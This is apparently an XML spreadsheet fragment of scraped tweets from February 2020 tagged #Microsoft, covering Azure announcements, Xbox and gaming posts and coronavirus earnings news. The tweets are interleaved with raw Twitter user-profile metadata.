  <si>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01:35:55 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft what the hell did you guys do on the new Minecraft update on #XboxOne  I owned the Xbox one edition and yall gave me the other one free but now yall take it away when I try and sign in wtf did yall do?</t>
  </si>
  <si>
    <t>{'id': 1113581418700058624, 'id_str': '1113581418700058624', 'name': 'oh', 'screen_name': 'depressedpasito', 'location': 'United States', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Wed Apr 03 23:17:54 +0000 2019',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'http://pbs.twimg.com/profile_images/1191742765752823809/svkPdbvP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191742765752823809/svkPdbvP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1113581418700058624/1554334588',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</si>
  <si>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01:35:39 +0000 2020</t>
  </si>
  <si>
    <t>Browser War 2020: #Google and #Microsoft Fight For Market Share
https://t.co/37MLjoIpRS https://t.co/rYRleOcO6M</t>
  </si>
  <si>
    <t>Thu Feb 27 01:32:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Corporation released a new update for Microsoft OneDrive : Version 11.22.11 https://t.co/HVJ9cVoxw7 #microsoft #onedrive @onedrive for #ios</t>
  </si>
  <si>
    <t>{'id': 79791345, 'id_str': '79791345', 'name': 'TRELOHAN Kevin', 'screen_name': 'ktrelohan', 'location': 'Nantes', 'description': 'MVP SharePoint Server &amp; Services et passionnÃ© par les technlogies Microsoft, venez dÃ©couvrir SharePoint et Teams simplement en lisant mes tweets.', 'url': 'https://t.co/nvAW0gJCVs', 'entities': {'url': {'urls': [{'url': 'https://t.co/nvAW0gJCVs', 'expanded_url': 'http://www.dev-ds.fr', 'display_url': 'dev-ds.fr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1159, 'friends_count': 3138, 'listed_count': 208, 'created_at': 'Sun Oct 04 18:07:03 +0000 2009', 'favourites_count': 1669, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5735,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'http://pbs.twimg.com/profile_images/1004806527721537537/_6v0w9Lf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1004806527721537537/_6v0w9Lf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/79791345/1528399217',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</si>
  <si>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01:31:20 +0000 2020</t>
  </si>
  <si>
    <t>Artificial Intelligence Event: Microsoft Internet of Things IOT - Orlando
https://t.co/ZE6vIZVs1X  #ArtificialIntelligence #AI #healthcare #Tech #technology #Microsoft @msdev #WednesdayWisdom #IoT #Orlando #Florida</t>
  </si>
  <si>
    <t>{'id': 944826755793281024, 'id_str': '944826755793281024', 'name': 'Black Women in AI', 'screen_name': 'BlackWomenInAI', 'location': '', 'description': 'Telling the Story of Black women working in the Artificial Intelligence sector- Artificial Intelligence Advocate - Artificial Intelligence Ambassador', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Sun Dec 24 07:07:07 +0000 2017', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 53, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1128561130857742336/HEk8TZ7g_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1128561130857742336/HEk8TZ7g_normal.png',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</si>
  <si>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01:29:59 +0000 2020</t>
  </si>
  <si>
    <t>#Dell and #Capgemini use Power BI to analyze their data. Want to learn about more things that make #PowerBI indispensable? Read this article https://t.co/P3YcVfrsEm.
#BI #Tech #ThursdayThoughts #Tableau #Microsoft #AI #data</t>
  </si>
  <si>
    <t>Thu Feb 27 01:25:00 +0000 2020</t>
  </si>
  <si>
    <t>OTOMEDIUS EXCELLENT
Konami - Xbox 360
List price: US$ 11.79
Special price: US$ 9.99*
You save: US$ 1.80 (15%)
#playasia #affiliate #OTOMEDIUS  #weeklyspecial #sale #xbox360 #microsoft 
https://t.co/mbxhYWz7dF https://t.co/8IS3TNfOXk</t>
  </si>
  <si>
    <t>Thu Feb 27 01:23:12 +0000 2020</t>
  </si>
  <si>
    <t>Proton Tether Hoooo!!!! | Journey to the Savage Planet #3
https://t.co/FO4Ksg1rYk 
#kberrygaming #youtube #pc #gaming #steamgames #steam #ea #kristikberry #epic #epicgames #TyphoonStudios #505Games #adventure #PlayStation #microsoft #ps4 #xbox #Nintendo #journeytothesavageplanet</t>
  </si>
  <si>
    <t>Thu Feb 27 01:14:53 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Sodinokibi Ransomware May Tip NASDAQ on Attacks to Hurt Stock Prices:" https://t.co/dwXJHO7sVn
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 01:14:52 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Browser War 2020: Google and Microsoft Fight For Market Share:" https://t.co/uEYMdQAhgr
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 01:09:59 +0000 2020</t>
  </si>
  <si>
    <t>Azure Quantum is a cloud ecosystem for developing quantum computing applications. #Azure #Quantum #Microsoft
https://t.co/4qaHSnuSVK</t>
  </si>
  <si>
    <t>Thu Feb 27 01:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available https://t.co/tEMZQGzzzc #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 01:05:13 +0000 2020</t>
  </si>
  <si>
    <t>J.P. Morgan and the Westchester Biotech Project, a coalition of biopharma and healthcare industry stakeholders in suburban Westchester County, NY, are launching a partnership aimed at strengthening the regions biopharma and healthcare cluster. #microsoft https://t.co/ejxddPrEmV https://t.co/EmRc5n90Zm</t>
  </si>
  <si>
    <t>Thu Feb 27 01:02:35 +0000 2020</t>
  </si>
  <si>
    <t>Interested in joining this group? Id love to hear your thoughts on our real estate related discussions. Join us. 
For those who are local, we meet in Seattle and Bellevue multiple times each month. 
#microsoft #amazon #facebook #apple #softwaredevelop...https://t.co/cADw22xYfd</t>
  </si>
  <si>
    <t>{'id': 44441426, 'id_str': '44441426', 'name': 'Blake E. Robbins', 'screen_name': 'MrBlakeRobbins', 'location': 'Seattle, WA', 'description': 'Principal, Hillstone Capital - I enjoy accomplishing great things with great people; I am committed to growth. Your best days are ahead. Discover it.', 'url': 'https://t.co/S8pM1BnKaM', 'entities': {'url': {'urls': [{'url': 'https://t.co/S8pM1BnKaM', 'expanded_url': 'http://hillstone.capital', 'display_url': 'hillstone.capital', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1019, 'friends_count': 1893, 'listed_count': 32, 'created_at': 'Wed Jun 03 19:57:59 +0000 2009', 'favourites_count': 616, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5179,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'http://pbs.twimg.com/profile_images/751905016827355136/hyrb0xW__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/751905016827355136/hyrb0xW__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44441426/1435245417', 'profile_link_color': '2F2FE0', 'profile_sidebar_border_color': '9E9E9E', 'profile_sidebar_fill_color': 'F0EBEB', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 01:02:26 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/W7xothJVyb</t>
  </si>
  <si>
    <t>Thu Feb 27 01:01:31 +0000 2020</t>
  </si>
  <si>
    <t>Global manufacturer, Coats, moved over 180 servers and its entire SAP estate to #Microsoft #Azure, reducing run costs by 25-30%. Contact Danquah Group, LLC to find out what Azure can do for you. https://t.co/0wQOc8PRC0</t>
  </si>
  <si>
    <t>Thu Feb 27 01:01:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #FlightSimulator 2020 includes every airport on #Earth -  https://t.co/kbatvXW1DA https://t.co/3mxwnfCFid</t>
  </si>
  <si>
    <t>Thu Feb 27 01:00:11 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/TjDTp8QeCR</t>
  </si>
  <si>
    <t>Thu Feb 27 01:00:00 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 1123365547129831424, 'id_str': '1123365547129831424', 'name': 'Interactive Video Marketing', 'screen_name': 'InteractiveVid2', 'location': 'North Carolina, USA', 'description': 'In search of the best Digital Marketing, CRM, Sales &amp; Lead Generation, Research.  Marketing Analysis &amp; Investment', 'url': 'https://t.co/3ooDjBcjFc', 'entities': {'url': {'urls': [{'url': 'https://t.co/3ooDjBcjFc', 'expanded_url': 'http://InteractiveVideoMarketing.net', 'display_url': 'InteractiveVideoMarketing.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 696, 'friends_count': 680, 'listed_count': 9, 'created_at': 'Tue Apr 30 23:16:32 +0000 2019', 'favourites_count': 494, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6468, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1123550617891373056/coqohPlN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123550617891373056/coqohPlN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1123365547129831424/1556713316',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</si>
  <si>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00:56:47 +0000 2020</t>
  </si>
  <si>
    <t>Co-taught AZ300 and AZ301 this morning to lots of #microsoft folks, more knowledge expunging goodness in store for tomorrow.  Now I find myself writing migration scenarios for the #Azure team.</t>
  </si>
  <si>
    <t>Thu Feb 27 00:51:46 +0000 2020</t>
  </si>
  <si>
    <t>@VDIHacker So much fun showing people #FIDO2 &amp;amp; #Microsoft Authenticator passwordless phone signin with Azure AD, #Citrix Workspace, &amp;amp; O365 up close. Great discussions! Thank you @andrewsyjun @stephaniekind3l for the #eWBM &amp;amp; #HIDGlobal keys so ppl could start their own #passwordless journeys</t>
  </si>
  <si>
    <t>Thu Feb 27 00:49:27 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 00:47:57 +0000 2020</t>
  </si>
  <si>
    <t>Gt: RealKagami
@lildurk 
#codmemes #gungame #modernwarfare #game #gameplay #multiplayer #explore #exploremore #explorepage #viral #gamer #bo4 #xboxone #microsoft #callofdutymodernwarfare #mw #shooting #shoutout #followforfollowback #fps #cod #won #esports #lildurk https://t.co/Ufy0g7uxBW</t>
  </si>
  <si>
    <t>{'id': 1159080956789215232, 'id_str': '1159080956789215232', 'name': 'RealKagami', 'screen_name': 'KagamiReal', 'location': '', 'description': 'Gamer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 42, 'listed_count': 0, 'created_at': 'Wed Aug 07 12:36:49 +0000 2019', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 81, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1159081051207192577/zftvs9FP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1159081051207192577/zftvs9FP_normal.jpg',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</si>
  <si>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00:47:08 +0000 2020</t>
  </si>
  <si>
    <t>Scalable Apache JMeter Test Framework using Azure Kubernetes Service and Grafana https://t.co/NrbdpgklkX #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 00:43:57 +0000 2020</t>
  </si>
  <si>
    <t>Why Apple And Microsoft Are Moving AI To The Edge #AI #EdgeComputing #IoT #InternetOfThings #VIKEZ #Apple #Microsoft #cool #startups #innovation #ArtificialIntelligence #ML #TechTrends 
https://t.co/lUyb5qqQEs https://t.co/PWcCYqLz16</t>
  </si>
  <si>
    <t>Thu Feb 27 00:41:35 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available  https://t.co/WsWjTmLUOG   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 00:40:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft #AzureIoT Developer (Exam AZ-220) Specialty Certification  New in 2020!
 #AzureIoTCentral #microsoftcertified #Microsoft #AzureFamily
https://t.co/Vu5FilCQts</t>
  </si>
  <si>
    <t>{'id': 755421657892737024, 'id_str': '755421657892737024', 'name': 'Build IoT', 'screen_name': 'BuildIoT', 'location': 'All the things!', 'description': 'All about Internet of Things! All the #IoT things!!! from @Build5Nines and @crpietschmann', 'url': 'https://t.co/mRFs52dXDf', 'entities': {'url': {'urls': [{'url': 'https://t.co/mRFs52dXDf', 'expanded_url': 'http://BuildIoTCore.com', 'display_url': 'BuildIoTCore.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 265, 'friends_count': 81, 'listed_count': 58, 'created_at': 'Tue Jul 19 15:18:53 +0000 2016', 'favourites_count': 296, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4023,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'http://pbs.twimg.com/profile_images/1165925134462521344/08pHdPyx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165925134462521344/08pHdPyx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/755421657892737024/1566813193',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</si>
  <si>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00:37:52 +0000 2020</t>
  </si>
  <si>
    <t>If you having issues with admin privileges on xbox game pass beta for pc change your DNS to google public DNS
#Xbox #XboxGamePass #XboxGamePassUltimate #PCGaming #Microsoft #live #Windows10</t>
  </si>
  <si>
    <t>{'id': 1024136792885215232, 'id_str': '1024136792885215232', 'name': 'Ice weasal', 'screen_name': 'iceweasal', 'location': 'Tasmania, Australia', 'description': '| "B0WSER DID IT" Co-host and Producer  | Photographer | #KOOPATROOP | #razerstreamer', 'url': 'https://t.co/SmwlR6iKLq', 'entities': {'url': {'urls': [{'url': 'https://t.co/SmwlR6iKLq', 'expanded_url': 'http://www.twitch.tv/ice_weasal', 'display_url': 'twitch.tv/ice_weasal', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 382, 'friends_count': 147, 'listed_count': 0, 'created_at': 'Tue Jul 31 03:36:53 +0000 2018', 'favourites_count': 892, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1564, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1208710728825262080/JVqX48hV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208710728825262080/JVqX48hV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1024136792885215232/1577014093',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</si>
  <si>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Feb 27 00:37:12 +0000 2020</t>
  </si>
  <si>
    <t>Transforming Day-2 Operations with Cisco Data Center Network Assurance and Insights https://t.co/Dnyf1LfaE0 For more info: https://t.co/op9cglgpE5 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #tech https://t.co/iHJaOFf4RP</t>
  </si>
  <si>
    <t>Thu Feb 27 00:36:05 +0000 2020</t>
  </si>
  <si>
    <t>This one took really long but how can it not when it's on Kubernetes? https://t.co/d6NwctT2QX #Kubernetes #Containers #Docker #Azure #Microsoft #AKS #Food #Mail #ExplainByExample #Learning #ContainerManagement #BlogPost #Containerization #Commercialization</t>
  </si>
  <si>
    <t>{'id': 1113948335474233344, 'id_str': '1113948335474233344', 'name': 'Michelle Xie', 'screen_name': 'mishxie', 'location': 'Australia', 'description': 'â˜ï¸ Azure Specialist @ Microsoft \nðŸ‘©ðŸ» A Techie + A Foodie \nðŸ‡¦ðŸ‡º Melbourne Based\nðŸŒ On a mission to save our planet\n+ Tweets are not affiliated with Microsoft +', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 161, 'listed_count': 0, 'created_at': 'Thu Apr 04 23:35:54 +0000 2019', 'favourites_count': 103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 49, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161269109948071938/fX31VTzl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161269109948071938/fX31VTzl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1113948335474233344/1568901606',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</si>
  <si>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Feb 27 00:32:57 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience. #Microsoft #Microsoft365 https://t.co/uHMC5kghx2</t>
  </si>
  <si>
    <t>Thu Feb 27 00:32:22 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available: https://t.co/umPJiKSeG9 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 00:31:09 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available https://t.co/BqXYWkwELD  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Thu Feb 27 00:22:00 +0000 2020</t>
  </si>
  <si>
    <t>If you're not providing your customers with the best sales experience, they'll go somewhere where they can get it. #Microsoft Sales Experience provides you with the tools you need to deliver the best sales experience for your customers. https://t.co/0tcwu1LrFN</t>
  </si>
  <si>
    <t>{'id': 256770328, 'id_str': '256770328', 'name': 'Amit Shah', 'screen_name': 'iamamitshah', 'location': 'New York ', 'description': 'Partner, Incipient Corporation', 'url': 'https://t.co/uPFUfjH6yM', 'entities': {'url': {'urls': [{'url': 'https://t.co/uPFUfjH6yM', 'expanded_url': 'http://www.incipientcorp.com', 'display_url': 'incipientcorp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 525, 'friends_count': 719, 'listed_count': 32, 'created_at': 'Thu Feb 24 01:35:23 +0000 2011', 'favourites_count': 58, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1166,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'http://pbs.twimg.com/profile_images/1200830598048309248/JHuuRYh7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200830598048309248/JHuuRYh7_normal.jpg', 'profile_link_color': '005C99',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</si>
  <si>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If you're not providing your customers with the best sales experience, they'll go somewhere where they can get it. #Microsoft Sales Experience provides you with the tools you need to deliver the best sales experience for your customers. https://t.co/1667JcqNpk</t>
  </si>
  <si>
    <t>{'id': 2440583436, 'id_str': '2440583436', 'name': 'Incipient Corp.', 'screen_name': 'Incipientcorp', 'location': '71 Union Avenue Rutherford, NJ', 'description': 'Incipient is a leading software consulting firm based in Rutherford, NJ specializing in the implementation of ERP, CRM, Mobile, and Cognitive Technologies', 'url': 'https://t.co/uPFUfjpvac', 'entities': {'url': {'urls': [{'url': 'https://t.co/uPFUfjpvac', 'expanded_url': 'http://www.incipientcorp.com', 'display_url': 'incipientcorp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 670, 'friends_count': 966, 'listed_count': 55, 'created_at': 'Sat Apr 12 20:50:48 +0000 2014', 'favourites_count': 233, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1842,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'http://pbs.twimg.com/profile_images/750662903229980672/Sf373ygy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/750662903229980672/Sf373ygy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2440583436/1505742920', 'profile_link_color': 'D00000',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</si>
  <si>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Feb 27 00:21:59 +0000 2020</t>
  </si>
  <si>
    <t>If you're not providing your customers with the best sales experience, they'll go somewhere where they can get it. #Microsoft Sales Experience provides you with the tools you need to deliver the best sales experience for your customers. https://t.co/cqSshgSfhZ</t>
  </si>
  <si>
    <t>{'id': 205278521, 'id_str': '205278521', 'name': 'Bryan Weinert', 'screen_name': 'BryanWeinert', 'location': 'New York, NY', 'description': 'Co-Founder/COO of Incipient. Traveler, Entrepreneur and Creative Thinker!', 'url': 'https://t.co/CaYAwjHJBs', 'entities': {'url': {'urls': [{'url': 'https://t.co/CaYAwjHJBs', 'expanded_url': 'http://IncipientApps.com', 'display_url': 'IncipientApps.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6848, 'friends_count': 5708, 'listed_count': 137, 'created_at': 'Wed Oct 20 14:22:22 +0000 2010', 'favourites_count': 592, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0084B4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/704297835961806848/Gb5R-jnf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/704297835961806848/Gb5R-jnf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/205278521/1513299776', 'profile_link_color': '0084B4',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</si>
  <si>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Feb 27 00:21:29 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available  https://t.co/2EVtNNuS55  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 00:20:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft warns on outlook over #coronavirus-related supply problems - https://t.co/tOFdW8uwpM</t>
  </si>
  <si>
    <t>Thu Feb 27 00:20:42 +0000 2020</t>
  </si>
  <si>
    <t>So #Mixer and #Microsoft spent tons of money to secure streamers instead of games.
https://t.co/hovtH3Lyi7</t>
  </si>
  <si>
    <t>Thu Feb 27 00:19:51 +0000 2020</t>
  </si>
  <si>
    <t>Contest Winners: Secure Everything with #Azure Sphere by Hackster, Microsoft, and AVNet
 #Contest #Hackster #Microsoft #AzureFamily
https://t.co/y1S0Oj9Xtc</t>
  </si>
  <si>
    <t>Thu Feb 27 00:14:14 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Load Balancer TCP resets on idle timeout is now available
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/8VoHDIQzOM</t>
  </si>
  <si>
    <t>Thu Feb 27 00:13:17 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available  https://t.co/WsWjTmLUOG  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 00:11:23 +0000 2020</t>
  </si>
  <si>
    <t>@AlexBowman88 @Microsoft paint scheme concept. @TeamHendrick @NASCAR @BillGates #NASCAR #Racing #motorsports #design #chevy #camaro #PaintScheme #WednesdayVibes #racecar #sports #microsoft #technology #socialmedia #computers #windows #AlexBowman #HendrickMotorsports #CupSeries https://t.co/NaQiQzHWHq</t>
  </si>
  <si>
    <t>{'id': 1014569447582027777, 'id_str': '1014569447582027777', 'name': 'SHEVY PRICE DESIGNS', 'screen_name': 'S_PRICE_DESIGNS', 'location': '', 'description': 'Graphic Designer FOR HIRE.\nDesigns, logos, ANYTHING HMU!!!\nRacing fanatic in NASCAR, Indycar, &amp; F1.\nPAYPAL: priceshevy99@gmail.com\nEMAIL: priceshevy99@gmail.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 129, 'friends_count': 48, 'listed_count': 2, 'created_at': 'Wed Jul 04 17:59:40 +0000 2018', 'favourites_count': 24773, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3624,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'http://pbs.twimg.com/profile_images/1223454769106255872/nBDhOT_P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223454769106255872/nBDhOT_P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1014569447582027777/1580529133',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</si>
  <si>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Feb 27 00:10:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure Load Balancer TCP resets on idle timeout is now available https://t.co/QuP1TSJKKN #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Thu Feb 27 00:08:38 +0000 2020</t>
  </si>
  <si>
    <t>As we have been sharing over the past year, #Microsoft Edge mobile supports the same set of mgmt features as the Managed Browser, while providing a better end user experience. To make way for this improved experience, Microsoft will be retiring the Intune Managed Browser https://t.co/mQ1C4f1TuN</t>
  </si>
  <si>
    <t>Thu Feb 27 00:04:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Load Balancer TCP resets on idle timeout is now available https://t.co/rY3SzagXSt</t>
  </si>
  <si>
    <t>Thu Feb 27 00:00:26 +0000 2020</t>
  </si>
  <si>
    <t>What dumbass would agree to this?
#mw #mw2 #mw3 #modernwarfare #microsoft #xbox #xbox1 #xb1 #xboxone #xboxones #xboxonex #xboxgamer #xboxlive #cod #codww2 #callofduty #callofdutyww2 #callofdutymodernwarfare... https://t.co/3IQbCDwiir</t>
  </si>
  <si>
    <t>Wed Feb 26 23:54:37 +0000 2020</t>
  </si>
  <si>
    <t>Streets of Rage &amp;amp; its spiritual 3D sequel (IMO) #streetsofrage #spikeout #battlestreet #sega #genesis #segagenesis #megadrive #16bit #xbox #microsoft #brawler #beatemup #retrogaming #retrogamer #gamecollector... https://t.co/QjY8fx9PMc</t>
  </si>
  <si>
    <t>{'id': 78168635, 'id_str': '78168635', 'name': 'TheObsoletionist', 'screen_name': 'RetroCak', 'location': '', 'description': 'I make the old, boring, &amp; obsolete seem older, more boring, &amp; even more obsolete.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 31, 'listed_count': 0, 'created_at': 'Tue Sep 29 00:34:25 +0000 2009', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 429,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'http://pbs.twimg.com/profile_images/1158940328541528069/QYsr9gBU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158940328541528069/QYsr9gBU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/78168635/1565147882',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</si>
  <si>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Feb 26 23:53:56 +0000 2020</t>
  </si>
  <si>
    <t>#ITechskills #Academy provides #Microsoft #excel #training, #excel #intermediate #crash #course in #Mississauga, Ontario.
we offer excel #advanced #course #classes from excel #basic #training to #advance #level.
Please write your answer in comment box !!
Follow Us and ENJOY! https://t.co/Ke1u1WJ3CS</t>
  </si>
  <si>
    <t>Wed Feb 26 23:52:25 +0000 2020</t>
  </si>
  <si>
    <t>Add #Microsoft to the list of companies lowering #earnings expectations over #coronavirus worries.
https://t.co/r6xDBnc95z</t>
  </si>
  <si>
    <t>{'id': 106810410, 'id_str': '106810410', 'name': 'Bill Tropical Health', 'screen_name': 'bbbrieger', 'location': 'malaria', 'description': "Malaria, NTDs, Ebola, Health Systems, Atunluse, Otun Ba'asegun", 'url': 'https://t.co/PK3KOVAQY2', 'entities': {'url': {'urls': [{'url': 'https://t.co/PK3KOVAQY2', 'expanded_url': 'http://malariamatters.org/', 'display_url': 'malariamatters.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5108, 'friends_count': 4687, 'listed_count': 186, 'created_at': 'Wed Jan 20 19:27:46 +0000 2010', 'favourites_count': 71558, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29419,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'http://pbs.twimg.com/profile_images/515162872872042496/yBsATrMz_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/515162872872042496/yBsATrMz_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/106810410/1436143071', 'profile_link_color': '9266CC',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</si>
  <si>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Wed Feb 26 23:50:51 +0000 2020</t>
  </si>
  <si>
    <t>3 new repositories created in Microsoft
- 1 terraform-azure-devops-starter
- 2 coredns
- 3 azure-resource-manager-schemas
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 23:50:26 +0000 2020</t>
  </si>
  <si>
    <t>"#Microsoft said revenue from #Windows licenses and its #Surface devices are more negatively impacted than previously anticipated by #China's #CoronavirusOutbreak.
